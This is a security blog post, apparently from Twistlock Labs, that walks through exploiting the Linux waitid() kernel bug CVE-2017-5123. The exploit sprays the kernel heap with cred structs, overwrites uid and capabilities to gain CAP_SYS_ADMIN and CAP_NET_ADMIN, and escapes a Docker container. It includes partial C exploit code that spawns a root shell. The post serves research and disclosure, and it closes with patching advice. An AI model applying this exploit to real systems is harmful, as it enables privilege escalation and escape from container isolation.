This post describes how I exploited the waitid() vulnerability to modify the Linux capabilities of a Docker container, gain elevated privileges, and ultimately escape the container jail. If you want to see how Twistlock would stop this vulnerability in its tracks, check out my follow-up blog post.

But before we dive in, since an image is worth a thousand words, here is my exploit in action. It modifies the containerized process capabilities structure in memory, resulting in a gain of CAP_SYS_ADMIN and CAP_NET_ADMIN capabilities. This results in the ability to enable promiscuous mode on eth0 (docker bridge for the container):

Note that I have turned off kernel ASLR (KASLR) for the recording, but the exploit also works with KASLR enabled, since we can find the kernel base and the heap base by using the same vulnerability.

CVE-2017-5123 was published earlier this year, on Oct 12. It is a Linux kernel vulnerability in the waitid() syscall for 4.12-4.13 kernel versions. The waitid() syscall is defined as:

int waitid(idtype_t idtype, id_t id, siginfo_t *infop, int options);

The vulnerability allows an attacker to write partially controlled data to a kernel memory address of their choice. The kernel memory address is supplied as the infop pointer above, which points to a struct siginfo, described below. In this struct we can control several fields, specifically pid and status.

As you can see below, the control is rather indirect.

struct siginfo {
    int si_signo;
    int si_errno;
    int si_code;
    int padding;   // this remains unchanged by waitid
    int pid;       // process id
    int uid;       // user id
    int status;    // return code
};

Most of the values either cannot be controlled by us or are too limited in range for our needs. However, we can control the pid value by creating a lot of processes with fork() or clone() until we hit the desired pid. Still, we are limited by the pid_max value of the system, which defaults to 32768 (0x8000 in hex).

Note: In a non-containerized environment we could raise this limit after changing our uid to 0 and gaining root privileges, since root can write a larger value to /proc/sys/kernel/pid_max.

Linux Capabilities

In this section I'll give a short overview of Linux capabilities: what they are, how Docker uses them, and how they are represented in memory.

The code snippet below is taken from linux/cred.h and is the definition of the credentials struct that each process has:

struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC    0x43736564
#define CRED_MAGIC_DEAD    0x44656144
#endif
    kuid_t        uid;        /* real UID of the task */
    kgid_t        gid;        /* real GID of the task */
    kuid_t        suid;        /* saved UID of the task */
    kgid_t        sgid;        /* saved GID of the task */
    kuid_t        euid;        /* effective UID of the task */
    kgid_t        egid;        /* effective GID of the task */
    kuid_t        fsuid;        /* UID for VFS ops */
    kgid_t        fsgid;        /* GID for VFS ops */
    unsigned    securebits;    /* SUID-less security management */
    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;    /* caps we're permitted */
    kernel_cap_t    cap_effective;    /* caps we can actually use */
    kernel_cap_t    cap_bset;    /* capability bounding set */
    kernel_cap_t    cap_ambient;    /* Ambient capability set */
    /* ... remaining fields omitted ... */
};


man capabilities:

Starting with kernel 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled.
Capabilities are a per-thread attribute.

Linux capabilities are stored inside each process’s own cred struct and represented by a bitmask. For example all caps enabled would be represented by a bitmask of 0xFFFFFFFFFFFFFFFF.

Each capability provides a different set of permissions, for instance:

CAP_SYS_MODULE  – allows for loading & unloading kernel modules.

CAP_NET_ADMIN – allows for various network operations. For example entering promiscuous mode, interface configuration and more.

CAP_SYS_ADMIN – enables a range of system administration operations such as quotactl, mount, umount, swapon, setdomainname, ptrace and much more (this cap gives the most privileges and overloads others).

You can find the full list of CAPS over here.

Docker uses capabilities to provide better isolation for containers. It simply drops capabilities that would enable container escape. For example, you will rarely see a container running out-of-the-box with any of the 3 capabilities above, as it would be a security concern if a container could access the network interface and sniff the traffic of other containers or the host itself, or if a user inside the container could mount directories on the host and load kernel modules.

Although it might be easier to build a ROP chain and call commit_creds(prepare_kernel_cred(0)) in order to gain root with full capabilities, I wanted to learn more about heap spraying, so I decided to go with the blind exploitation method of spraying the kernel heap with thousands of struct creds, like Federico did. The downside of this exploit is that full caps are impossible to reach, as we are not in full control of what we are writing (we are limited to 0x8000) and the value of 0xFFFFFFFFFFFFFFFF is out of reach for us.

The vulnerability

The code snippet below is taken from kernel/exit.c and is in charge of handling the waitid() syscall:

SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
        infop, int, options, struct rusage __user *, ru)
{
    struct rusage r;
    struct waitid_info info = {.status = 0};
    long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
    int signo = 0;

    if (err > 0) {
        signo = SIGCHLD;
        err = 0;
        if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
            return -EFAULT;
    }
    if (!infop)
        return err;

    if (!access_ok(VERIFY_WRITE, infop, sizeof(*infop)))
        return -EFAULT;

    user_access_begin();
    unsafe_put_user(signo, &infop->si_signo, Efault);
    unsafe_put_user(0, &infop->si_errno, Efault);
    unsafe_put_user(info.cause, &infop->si_code, Efault);
    unsafe_put_user(info.pid, &infop->si_pid, Efault);
    unsafe_put_user(info.uid, &infop->si_uid, Efault);
    unsafe_put_user(info.status, &infop->si_status, Efault);
    user_access_end();
    return err;
Efault:
    user_access_end();
    return -EFAULT;
}

The vulnerability is that the access_ok() check shown above, which ensures that the user-specified pointer is in fact a user-space pointer, was missing from the waitid() syscall in the vulnerable kernels. Without this check a user can supply a kernel address and the syscall will write to it without objection when executing unsafe_put_user().

As we already know, we can't simply write whatever we want, so we have to gain as much as we can within these limitations.

info.status is a 32-bit int, but the value of status is constrained to 0 <= status < 256, as we can see in the exit codes documentation, and as we already know, pid is constrained by pid_max.

At this point we have the ability to write a pid value, 0 < pid < 0x8000, anywhere we want. The next challenge is to work out where we should write in order to successfully overwrite the desired values. We need to remember that the syscall actually writes 6 different fields each time we execute it, as there are 6 executions of unsafe_put_user(). So we need to take the offset of pid inside the infop struct and subtract it from the target address that we want to write to; the result is then passed to the waitid() syscall as the infop pointer. Our main goal with this exploit is to overwrite the capabilities that Docker sets for us, thus gaining additional privileges and escaping the container.

Spray n’ Pray

I decided to take an approach similar to Federico, so I proceeded to spray the kernel heap with thousands of struct creds and then start guessing by writing to various addresses and pray to hit my target.

By picking a value that we can track, such as uid (which we can read back with getuid()), we can, with a little bit of luck, pinpoint the location of our struct cred. After that we will be able to write to specific offsets in order to overwrite the capabilities, gid, euid and anything else we want.
But in order to do that we need to figure out the actual offsets, which we will do with the help of gdb:

As we can see, kuid_t is 4 bytes in size, so if we found uid at 0xFFFF880023CC1004 then gid will be at 0xFFFF880023CC1008, 4 bytes above, and euid will be at 0xFFFF880023CC1014, which is 4*0x4=0x10 bytes above our uid address, as illustrated in the diagram below.

So essentially in order to overwrite our caps we will have to write to:
address_of_uid+0x4*9 = address_of_uid+0x24 = address_of_cap_inheritable (uid itself plus the eight 4-byte fields from gid through securebits precede the capability sets)
Note: These addresses are relevant to my system, your addresses might differ.

In order to find out where our sprayed cred structs might land in the heap we will use gdb again and set a breakpoint on sys_getuid in order to break when our program calls getuid().

A few step commands after the breakpoint (it took 5 on my system) should reveal the cred struct address in the RAX register.

We can repeat that process for a number of forked processes in order to collect enough addresses and analyze the statistics of where the struct cred is most likely to land in the heap.

So the plan is as follows:

  1. Spawn thousands of processes by calling fork() in order to create thousands of cred structs in the kernel heap and make each of the processes constantly check if its UID==0 by calling getuid()
  2. Start writing the value 0 to addresses where a struct cred->uid might have landed
  3. If and when one of our forked processes gets uid==0, it means that we have successfully overwritten the uid value with our guesses from step 2. Now we can overwrite the rest of the cred struct and change caps by writing to the offsets that we determined.

Our dirty exploit will be something to the effect of:

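void writecaps(char *addr, unsigned long value) {
    while (1) {
        /* Keep creating short-lived children until one gets the pid we want to write. */
        int pid = clone(exit_func, &new_stack[5000], CLONE_VM | SIGCHLD, NULL);
        if (!pid) {
            exit(0);
        }
        if (pid == value) {
            /* waitid() stores the matching pid at the (kernel) address in addr. */
            syscall(SYS_waitid, P_PID, pid, addr, WEXITED, NULL);
            break;
        }
    }
}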

void spraynpray() {
    pid_t pid;
    char *argv[] = {"/bin/sh", NULL};

    for (int i = 0; i < 5000; i++) {
        pid = fork();
        if (pid == 0) { // child process
            while (1) {
                if (*glob_var == 1) {
                    // another child already hit the target
                    syscall(SYS_exit, 0);
                }
                if (getuid() == 0) {
                    // FOUND!! our cred->uid was overwritten
                    printf("[+] Got UID: 0 !\n");
                    *glob_var = 1;
                    writecaps((char *)finalcapsaddress, value);
                    printf("Done, spawning a shell \n");
                    execve("/bin/sh", argv, NULL);
                }
            }
        } else if (pid < 0) {
            printf("failed to fork");
        } else { // parent process: keep spraying
        }
    }
}

void swapuid() {
    char *i;

    while (*glob_var != 1) {
        /* Walk candidate cred->uid addresses, 0xc0 bytes apart. */
        for (i = (char *)0xffff8800321b4004; ; i += 0xc0) {
            if (*glob_var == 1) {
                break;
            }
            printf("trying %p\n", i);
            syscall(__NR_waitid, P_PID, 0, (siginfo_t *)i, WEXITED, NULL);
            sleep(1);
        }
    }
    munmap(glob_var, sizeof *glob_var);
    printf("Found uid on %p\n", i - 0xc0);
    sleep(10000);
}

int main(void)
{
    glob_var = mmap(NULL, sizeof *glob_var, PROT_READ | PROT_WRITE,
                    MAP_SHARED | MAP_ANONYMOUS, -1, 0);

    *glob_var = 0;

    unsigned long *base = findbase();
    findheapbase();
    spraynpray();
    swapuid();
}

After analyzing my system (Ubuntu 17.10, kernel 4.13.0-15, x86-64), I found a couple of heap regions where the cred struct landed in about 70% of the executions. There is still a risk of crashing the machine, because a wrong guess may overwrite something important in the kernel.

Conclusion

In 2017 alone, 434 Linux kernel exploits were found, and as you have seen in this post, kernel exploits can be devastating for containerized environments. This is because containers share the same kernel as the host, so trusting the built-in protection mechanisms alone isn't sufficient. Make sure your kernel is always updated on all of your production hosts.

Thank you for reading and don’t forget to follow us @TwistlockLabs.

Big credits to Federico Bento for pointing some things out and to Chris Salls for his Chrome sandbox escape exploit; my exploitation is heavily based on their work.